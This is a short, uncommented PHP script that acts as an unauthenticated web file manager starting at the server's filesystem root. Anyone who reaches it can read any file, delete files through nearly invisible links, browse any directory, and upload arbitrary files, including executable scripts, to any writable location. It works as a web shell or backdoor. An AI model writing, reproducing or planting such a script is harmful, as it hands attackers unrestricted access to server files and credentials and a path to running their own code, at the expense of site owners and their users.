<?php

if(count($_POST)){$posting=1; $temp=get_post(); $post_a=$temp["post_a"]; $post_s=$temp["post_s"]; $post_h=$temp["post_h"];}
if(count($_GET)){$getting=1; $temp=get_get(); $get_a=$temp["get_a"]; $get_s=$temp["get_s"]; $get_h=$temp["get_h"];}

if($_GET['dir']){
	$path = $get_s['dir'];
}else{
	$path = '/.';
}

if($_GET['file']){
	echo file_get_contents($get_s['file']);
	exit;
}

if($_GET['del']){
	if(@unlink($get_s['del'])){
		echo "file $get_s[del] deleted.";
	}else{
		echo "file $get_s[del] cannot delete.";
	}
	exit;
}

$this_path =  dirname(dirname(__FILE__));
$this_file = basename($_SERVER["PHP_SELF"]);

if($_POST['q']){
	//check file upload
	if($_FILES){
		foreach($_FILES as $file => $details){
			if(!empty($details['name'])){
				$uploaded_files[$file] = $details;
				$uploaded_files[$file]['extension'] = strtolower(substr($details['name'], strrpos($details['name'], ".")+1));
				if($details['error']){
					echo "error uploading file.<br />\n";
				}else{
					$uploaded_files[$file]['success'] = true;
				}
			}
		}
	}
	if($uploaded_files){
		foreach($uploaded_files as $file => $details){
			if($details['success']){
				if(file_exists($path .'/'. $details['name'])){
					echo "file $path/$details[name] exists, not uploaded.<br />";
				}elseif(@move_uploaded_file($details['tmp_name'], $path .'/'. $details['name'])){
					echo "file $details[name] uploaded to $path/<br />";
				}else{
					echo "file $details[name] upload failed/<br />";
				}
			}
		}
	}else{
		echo "no files uploaded.<br />";
	}
}

if ($handle = opendir($path)) {
    while (false !== ($file = readdir($handle))) {
        if ($file != "." && $file != "..") {
            if(is_dir($path .'/'. $file)){
				$dirs[] = $file;
			}else{
				$files[] = $file;
			}
        }
    }
    closedir($handle);
}

if($dirs){
	sort($dirs);
	foreach($dirs as $dir){
		$dir_list .= "<a href='$this_file?dir=".urlencode($path.'/'.$dir)."'>[$dir]</a><br />\n";
	}
}
if($files){
	sort($files);
	foreach($files as $file){
		$file_list .= "<a href='$this_file?file=".($tf = urlencode($path.'/'.$file))."' target='_blank'>$file</a> <a href='$this_file?del=$tf' onclick=\"return confirm('OK?');\" target='_blank'>&nbsp;&nbsp;&nbsp;</a><br />\n";
	}
}

$form = "
<form name='file_form' method='post' action='$this_file?$_SERVER[QUERY_STRING]' enctype='multipart/form-data'>
<input type='hidden' name='q' value='1' />
<input type='file' name='ufile' />
<input type='submit' />
</form>";

echo $form."<br /><br />Dirs: <br />\n$dir_list<br /><br />Files: <br />$file_list";


function get_post(){
 foreach($_POST as $post=>$value){
  $value=trim($value);
  $post_a[$post]=get_magic_quotes_gpc()? $value : AddSlashes($value);
  $post_s[$post]=get_magic_quotes_gpc()? StripSlashes($value) : $value;
  $post_h[$post]=htmlentities(get_magic_quotes_gpc()? StripSlashes($value) : $value);
 }
 return array("post_a"=>$post_a, "post_s"=>$post_s, "post_d"=>$post_d, "post_h"=>$post_h);
}

function get_get(){
 foreach($_GET as $get=>$value){
  $value=trim($value);
  $get_a[$get]=get_magic_quotes_gpc()? $value : AddSlashes($value);
  $get_s[$get]=get_magic_quotes_gpc()? StripSlashes($value) : $value;
  $get_h[$get]=htmlentities(get_magic_quotes_gpc()? StripSlashes($value) : $value);
 }
 return array("get_a"=>$get_a, "get_s"=>$get_s, "get_d"=>$get_d, "get_h"=>$get_h);
}

?>